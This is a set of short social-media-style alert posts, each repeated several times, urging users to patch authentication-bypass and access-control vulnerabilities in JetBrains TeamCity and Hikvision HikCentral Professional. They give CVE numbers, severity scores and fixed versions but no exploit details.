JetBrains has just patched critical vulnerabilities in TeamCity On-Premises software, tagged CVE-2024-27198 and CVE-2024-27199, with alarming CVSS scores of 9.8 and 7.3. These flaws allow unauthorized access to potentially gain full control over the TeamCity servers. Versions up to 2023.11.3 are affected, urging an immediate update to v2023.11.4. Kudos to Rapid7 for the timely discovery on Feb 20, 2024. Given past abuses by notorious APT groups, securing your systems against such authentication bypasses is crucial to thwart potential supply chain assaults. 🛡️💻
🔗 Source: BleepingComputer
Tags: #JetBrains #TeamCity #CyberSecurity #VulnerabilityAlert #CVE2024-27198 #CVE2024-27199 #Rapid7 #PatchNow #SupplyChainSecurity #AuthenticationBypass #InfoSec
🌍🔐👥
-
"🚨 Urgent TeamCity Vulnerabilities Alert! Patch Now! 🚨"
JetBrains has just patched critical vulnerabilities in TeamCity On-Premises software, tagged CVE-2024-27198 and CVE-2024-27199, with alarming CVSS scores of 9.8 and 7.3. These flaws allow unauthorized access to potentially gain full control over the TeamCity servers. Versions up to 2023.11.3 are affected, urging an immediate update to v2023.11.4. Kudos to Rapid7 for the timely discovery on Feb 20, 2024. Given past abuses by notorious APT groups, securing your systems against such authentication bypasses is crucial to thwart potential supply chain assaults. 🛡️💻
🔗 Source: BleepingComputer
Tags: #JetBrains #TeamCity #CyberSecurity #VulnerabilityAlert #CVE2024-27198 #CVE2024-27199 #Rapid7 #PatchNow #SupplyChainSecurity #AuthenticationBypass #InfoSec
🌍🔐👥
-
"🚨 Urgent TeamCity Vulnerabilities Alert! Patch Now! 🚨"
JetBrains has just patched critical vulnerabilities in TeamCity On-Premises software, tagged CVE-2024-27198 and CVE-2024-27199, with alarming CVSS scores of 9.8 and 7.3. These flaws allow unauthorized access to potentially gain full control over the TeamCity servers. Versions up to 2023.11.3 are affected, urging an immediate update to v2023.11.4. Kudos to Rapid7 for the timely discovery on Feb 20, 2024. Given past abuses by notorious APT groups, securing your systems against such authentication bypasses is crucial to thwart potential supply chain assaults. 🛡️💻
🔗 Source: BleepingComputer
Tags: #JetBrains #TeamCity #CyberSecurity #VulnerabilityAlert #CVE2024-27198 #CVE2024-27199 #Rapid7 #PatchNow #SupplyChainSecurity #AuthenticationBypass #InfoSec
🌍🔐👥
-
"🚨 Urgent TeamCity Vulnerabilities Alert! Patch Now! 🚨"
JetBrains has just patched critical vulnerabilities in TeamCity On-Premises software, tagged CVE-2024-27198 and CVE-2024-27199, with alarming CVSS scores of 9.8 and 7.3. These flaws allow unauthorized access to potentially gain full control over the TeamCity servers. Versions up to 2023.11.3 are affected, urging an immediate update to v2023.11.4. Kudos to Rapid7 for the timely discovery on Feb 20, 2024. Given past abuses by notorious APT groups, securing your systems against such authentication bypasses is crucial to thwart potential supply chain assaults. 🛡️💻
🔗 Source: BleepingComputer
Tags: #JetBrains #TeamCity #CyberSecurity #VulnerabilityAlert #CVE2024-27198 #CVE2024-27199 #Rapid7 #PatchNow #SupplyChainSecurity #AuthenticationBypass #InfoSec
🌍🔐👥
-
"🚨 Critical Security Alert: HikCentral Professional Vulnerabilities Exposed 🚨"
Hikvision's latest advisory reveals severe vulnerabilities in HikCentral Professional, identified by Michael Dubell and Abdulazeez Omar. CVE-2024-25063 and CVE-2024-25064, with CVSS scores of 7.5 and 4.3 respectively, highlight risks of unauthorized access due to insufficient server-side validation. Users are urged to upgrade to versions above V2.5.1 for enhanced security. Stay vigilant and prioritize updating to safeguard your systems! 🛡️💻🔐
CVE Summaries:
- CVE-2024-25063: Attackers could exploit server validation flaws to access restricted URLs, compromising confidentiality.
- CVE-2024-25064: Authenticated users could manipulate parameters to access unauthorized resources, posing a lower risk.
Source: Hikvision Security Advisory
Tags: #CyberSecurity #Hikvision #Vulnerability #CVE2024-25063 #CVE2024-25064 #ServerSecurity #InfoSec #PatchManagement 🌍🔒💡
-
"🚨 Critical Security Alert: HikCentral Professional Vulnerabilities Exposed 🚨"
Hikvision's latest advisory reveals severe vulnerabilities in HikCentral Professional, identified by Michael Dubell and Abdulazeez Omar. CVE-2024-25063 and CVE-2024-25064, with CVSS scores of 7.5 and 4.3 respectively, highlight risks of unauthorized access due to insufficient server-side validation. Users are urged to upgrade to versions above V2.5.1 for enhanced security. Stay vigilant and prioritize updating to safeguard your systems! 🛡️💻🔐
CVE Summaries:
- CVE-2024-25063: Attackers could exploit server validation flaws to access restricted URLs, compromising confidentiality.
- CVE-2024-25064: Authenticated users could manipulate parameters to access unauthorized resources, posing a lower risk.
Source: Hikvision Security Advisory
Tags: #CyberSecurity #Hikvision #Vulnerability #CVE2024-25063 #CVE2024-25064 #ServerSecurity #InfoSec #PatchManagement 🌍🔒💡
-
"🚨 Critical Security Alert: HikCentral Professional Vulnerabilities Exposed 🚨"
Hikvision's latest advisory reveals severe vulnerabilities in HikCentral Professional, identified by Michael Dubell and Abdulazeez Omar. CVE-2024-25063 and CVE-2024-25064, with CVSS scores of 7.5 and 4.3 respectively, highlight risks of unauthorized access due to insufficient server-side validation. Users are urged to upgrade to versions above V2.5.1 for enhanced security. Stay vigilant and prioritize updating to safeguard your systems! 🛡️💻🔐
CVE Summaries:
- CVE-2024-25063: Attackers could exploit server validation flaws to access restricted URLs, compromising confidentiality.
- CVE-2024-25064: Authenticated users could manipulate parameters to access unauthorized resources, posing a lower risk.
Source: Hikvision Security Advisory
Tags: #CyberSecurity #Hikvision #Vulnerability #CVE2024-25063 #CVE2024-25064 #ServerSecurity #InfoSec #PatchManagement 🌍🔒💡
-
"🚨 Critical Security Alert: HikCentral Professional Vulnerabilities Exposed 🚨"
Hikvision's latest advisory reveals severe vulnerabilities in HikCentral Professional, identified by Michael Dubell and Abdulazeez Omar. CVE-2024-25063 and CVE-2024-25064, with CVSS scores of 7.5 and 4.3 respectively, highlight risks of unauthorized access due to insufficient server-side validation. Users are urged to upgrade to versions above V2.5.1 for enhanced security. Stay vigilant and prioritize updating to safeguard your systems! 🛡️💻🔐
CVE Summaries:
- CVE-2024-25063: Attackers could exploit server validation flaws to access restricted URLs, compromising confidentiality.
- CVE-2024-25064: Authenticated users could manipulate parameters to access unauthorized resources, posing a lower risk.
Source: Hikvision Security Advisory
Tags: #CyberSecurity #Hikvision #Vulnerability #CVE2024-25063 #CVE2024-25064 #ServerSecurity #InfoSec #PatchManagement 🌍🔒💡